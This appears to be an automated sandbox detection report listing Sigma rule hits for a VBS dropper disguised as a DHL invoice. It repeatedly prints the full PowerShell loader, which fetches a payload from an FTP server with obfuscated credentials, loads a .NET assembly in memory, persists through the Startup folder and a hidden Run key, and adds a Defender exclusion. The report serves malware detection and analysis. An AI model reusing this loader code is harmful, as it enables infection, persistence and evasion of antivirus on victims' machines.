ProcessName: powershell.exe
                    Sigma detected: WScript or CScript Dropper
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs", ProcessId: 5460, ProcessName: wscript.exe
                    Sigma detected: Change PowerShell Policies to an Insecure Level
                    Source: Process startedAuthor: frack113: Data: Command: powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x11.ps1", CommandLine: powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x11.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$mkbxz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )));$lBCzSg = $mkbxz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mkbxz.dispose();$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mkbxz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ssalc/moc.esac2b//:sptth' , $huUPX , 'D D1D' ) );};", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1928, ParentProcessName: powershell.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x11.ps1", Proces
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7340, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_zhs
                    Sigma detected: PowerShell Download Pattern
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$mkbxz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )));$lBCzSg = $mkbxz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mkbxz.dispose();$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mkbxz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ssalc/moc.esac2b//:sptth' , $huUPX , 'D D1D' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f
                    Sigma detected: PowerShell Script Run in AppData
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: Data: Command: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit, CommandLine: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit, ProcessId: 7996, ProcessName: cmd.exe
                    Sigma detected: PowerShell Web Download
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$mkbxz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )));$lBCzSg = $mkbxz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mkbxz.dispose();$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mkbxz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ssalc/moc.esac2b//:sptth' , $huUPX , 'D D1D' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, CommandLine: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$mkbxz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )));$lBCzSg = $mkbxz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mkbxz.dispose();$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mkbxz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ssalc/moc.esac2b//:sptth' , $huUPX , 'D D1D' ) );};", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1928, ParentProcessName: powershell.exe, ProcessCommandLine: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, ProcessId: 6908, ProcessName: powershell.exe
                    Sigma detected: Suspicious Copy From or To System Directory
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$mkbxz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )));$lBCzSg = $mkbxz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mkbxz.dispose();$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mkbxz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ssalc/moc.esac2b//:sptth' , $huUPX , 'D D1D' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f
                    Sigma detected: Suspicious Powershell In Registry Run Keys
                    Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7340, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_zhs
                    Sigma detected: Usage Of Web Request Commands And Cmdlets
                    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$mkbxz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )));$lBCzSg = $mkbxz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mkbxz.dispose();$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mkbxz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ssalc/moc.esac2b//:sptth' , $huUPX , 'D D1D' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f
                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                    Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs", ProcessId: 5460, ProcessName: wscript.exe
                    Sigma detected: Local Accounts Discovery
                    Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: cmd.exe /c mkdir "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\", CommandLine: cmd.exe /c mkdir "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$mkbxz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )));$lBCzSg = $mkbxz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mkbxz.dispose();$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mkbxz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ssalc/moc.esac2b//:sptth' , $huUPX , 'D D1D' ) );};", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1928, ParentProcessName: powershell.exe, ProcessCommandLine: cmd.exe /c mkdir "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\", ProcessId: 4852, ProcessName: cmd.exe
